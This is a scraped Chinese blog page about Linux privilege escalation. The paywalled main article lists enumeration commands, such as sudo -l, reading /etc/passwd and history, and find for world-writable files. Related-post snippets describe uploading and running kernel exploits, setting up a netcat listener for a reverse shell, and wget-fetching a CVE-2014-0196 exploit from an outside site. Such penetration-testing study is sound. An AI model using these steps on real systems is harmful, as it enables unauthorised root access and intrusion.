linux 提权

最新推荐文章于 2024-09-10 14:29:57 发布
原创 最新推荐文章于 2024-09-10 14:29:57 发布
· 363 阅读 · 1 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

linux 提权

linux 提权

linux 本机信息枚举

常见命令

hostname # 主机名
uname -a # 查询系统信息
cat /etc/version # 查看进程信息
cat /etc/issue # 查看操作系统信息
ps -A #查看所有正在运行的进程
ps axjf #查看进程树
ps aux #选项将显示所有用户的进程 (a)、显示启动进程的用户 (u) 以及显示未连接到终端的进程 (x)
env # 显示环境变量
sodu -l # 查看用户允许已root权限运行哪些命令
id <username> # 提供用户权限级别的一般概述,以及组成员身份
cat /etc/passwd # 发现系统上用户
history # 查看用户历史命令
ifconfig # 显示网卡信息
ip route # 查看存在的网络路由
netstat -ano 查看网络状态

netstat -a # 显示所有侦听端口和已建立的连接。
netstat -at/-au # 用于列出 TCP 或 UDP 协议 分别。netstat
netstat -l # 显示处于“侦听”模式的端口
netstat -s # 按协议列出网络使用统计信息
netstat -tp # 列出包含服务名称和 PID 信息的连接。
netstat -i # 显示接口统计信息。

find命令大全

find . -name flag1.txt # 在当前目录查找文件
find /home -name flag1.txt # 在/home 目录查找文件
find / -type d -name config # 在/下找到名为config的目录
find / -type f -perm 0777 # 查找具有 777 权限的文件
find / -perm a=x # 查找可执行文件
find /home -user frank # 在h
最低0.47元/天 解锁文章
Linux总结
谢公子的博客
07-24 7980
Linux之前,我们先看看与Linux有关的一些知识: 我们常说的Linux系统,指的是Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群,大类有以下几种: Linux内核: Linux系统内核指的是一个由 Linus Torvalds 负责维护,供硬件抽象层、硬盘及文件系统控制及多任务功能的系统核心程序。 Li...
学习之旅——Linux操作系统
Lemon's blog
08-19 3158
前言: 上次学习了Windows操作系统的以及相关工具的利用,这次就来学习一下Linux操作系统的 Linux基础 0x00:Linux方法 大致归纳总结如下:
linux
ccssggoo的博客
06-30 4153
linux的各种方法
LINUX之环境变量
ALLEN'Blog
01-10 711
今天给大家带来了环境变量比较简单的方法不知道大家听明白了没有,环境变量中比较重要的就是结合suid限来展开,本文只是简单列举了其中的几个方法,因为本人也很少用这种方法,可能理解的不是很到位望大佬们指点,如果喜欢本文不妨一键三连支持一下。
Linux—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
linux(LinEsc)
weixin_51692662的博客
11-11 879
linux
升-linux手法总结
01-14
### 升-linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux手法总结以及 Linuxexp集合
02-22
本文将深入探讨Linux的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root限。例如...
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux扫描脚本
04-28
这篇文档将深入探讨Linux扫描的相关知识点,包括原理、常见方法、扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、原理 在Linux系统中,限分为三类:用户限、组限和所有者限。...
升:利用Linux漏洞
qq_68163788的博客
02-13 2978
Linux漏洞是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的限。这种方法通常被黑客用来获取系统管理员限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞方法是利用内核漏洞。内核是操作系统的核心部分,负责管理系统的资源和供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的限。
kernel-devel-3.10.0-327.el7.x86_64.rpm
03-05
安装CenterOS的时候需要用到的kernel-devel-3.10.0-327.el7.x86_64.rpm
简单的linux收集的N多linux内核exp
03-12
拿到shell了,准备.先看下linux内核 2.6.18-194.11.3.el5 内核 2010的,这个好CentOS release 5.5好 然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢? 因为tmp目录可写可执行一般,继续ing. 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后我们进到/tmp目录 cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194 我这里有限rwx,可读可写可执行.如果没有限chmod -R 777 文件名 我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了 成功了 其实linux还是很简单,关键看有没exp
kernel-3.10.0-1160.6.1.el7.x86_64.rpm
06-21
kernel-3.10.0-1160.6.1.el7.x86_64.rpm
【内网安全】——Linux姿势
Demo不是emo的博客
02-08 6181
Linux姿势汇总
2024全网最全面及最新且最为详细的网络安全技巧 (三) 之 linux各类技巧 下集———— 作者:LJS
跟我加入白帽大家庭,共捍亿万互联网用户安全!
06-09 1239
24网络安全Linux技巧——LJS
Linux kernel <= v3.15-rc4 本地 Exploit 已测
收集盒 Book box
05-24 2005
[8090sec@Test2 ~]$ id uid=501(8090sec) gid=501(8090sec) groups=501(8090sec) [8090sec@Test2 ~]$ wget http://www.8090sec.com/Exploit/cve-2014-0196-md.c [8090sec@Test2 ~]$ chmod +x cve-2014-0196-md.c
Linux思路+实战【很不错的文章】
大方子
10-04 2万+
Linux思路 前言 首先关于Linux我们得先明白几个概念。 linux发行版本 是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如: CentOS redhat ubuntu kali linux内核 Linux系统内核指的是一个由Linus Torvald...
day10
最新发布
2202_75430368的博客
09-10 492
1. 信息收集确定目标系统:首先,需要明确目标Linux系统的具体信息,包括其IP地址、操作系统版本、内核版本等。内核版本查询:使用uname -a命令查看目标系统的内核版本信息。这是确定是否存在可利用漏洞的关键步骤。2. 漏洞搜索与验证搜索漏洞:根据内核版本信息,在漏洞数据库(如Exploit-DB、CVE Details等)中搜索是否存在已知的内核漏洞。验证漏洞:通过测试或利用公开的漏洞利用代码(Exploit,简称EXP)来验证目标系统是否确实存在该漏洞。3. 漏洞利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值